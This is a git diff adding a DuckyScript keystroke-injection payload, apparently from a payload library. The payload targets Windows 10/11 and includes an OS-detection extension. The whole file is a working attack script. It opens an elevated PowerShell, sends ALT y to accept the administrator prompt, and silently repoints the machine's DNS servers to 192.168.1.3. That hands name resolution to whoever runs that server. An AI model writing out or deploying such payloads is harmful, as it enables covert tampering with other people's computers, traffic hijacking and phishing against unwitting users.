diff --git a/payloads/library/execution/DNS_changer/payload.txt b/payloads/library/execution/DNS_changer/payload.txt new file mode 100644 index 0000000..14dd010 --- /dev/null +++ b/payloads/library/execution/DNS_changer/payload.txt @@ -0,0 +1,69 @@ +REM Title: DNS changer +REM Author: luu176 +REM Description: Changes DNS address of windows machine in powershell +REM Target: Windows 10/11 + +REM wifi interface should be named: Wi-Fi +DEFINE #interface Ethernet +DEFINE #primaryDNS 192.168.1.3 +DEFINE #secondaryDNS 1.1.1.1 + +EXTENSION PASSIVE_WINDOWS_DETECT + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + Windows fully passive OS Detection and passive Detect Ready + Includes its own passive detect ready. + Does not require additional extensions. + + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + $_OS will be set to WINDOWS or NOT_WINDOWS + See end of payload for usage within payload + END_REM + + REM CONFIGURATION: + DEFINE #MAX_WAIT 150 + DEFINE #CHECK_INTERVAL 20 + DEFINE #WINDOWS_HOST_REQUEST_COUNT 2 + DEFINE #NOT_WINDOWS 7 + + $_OS = #NOT_WINDOWS + + VAR $MAX_TRIES = #MAX_WAIT + WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0)) + DELAY #CHECK_INTERVAL + $MAX_TRIES = ($MAX_TRIES - 1) + END_WHILE + IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN + $_OS = WINDOWS + END_IF + + REM_BLOCK EXAMPLE USAGE AFTER EXTENSION + IF ($_OS == WINDOWS) THEN + STRING HELLO WINDOWS! + ELSE + STRING HELLO WORLD! + END_IF + END_REM +END_EXTENSION + +SAVE_HOST_KEYBOARD_LOCK_STATE +GUI r +DELAY 150 +STRINGLN powershell Start-Process powershell -Verb runAs +DELAY 800 +ALT y +DELAY 500 +STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit +REM below is to blink the LED when payload done +VAR $i = 0 +WHILE ( $i < 9 ) + DELAY 150 + CAPSLOCK + $i = ( $i + 1 ) +END_WHILE +RESTORE_HOST_KEYBOARD_LOCK_STATE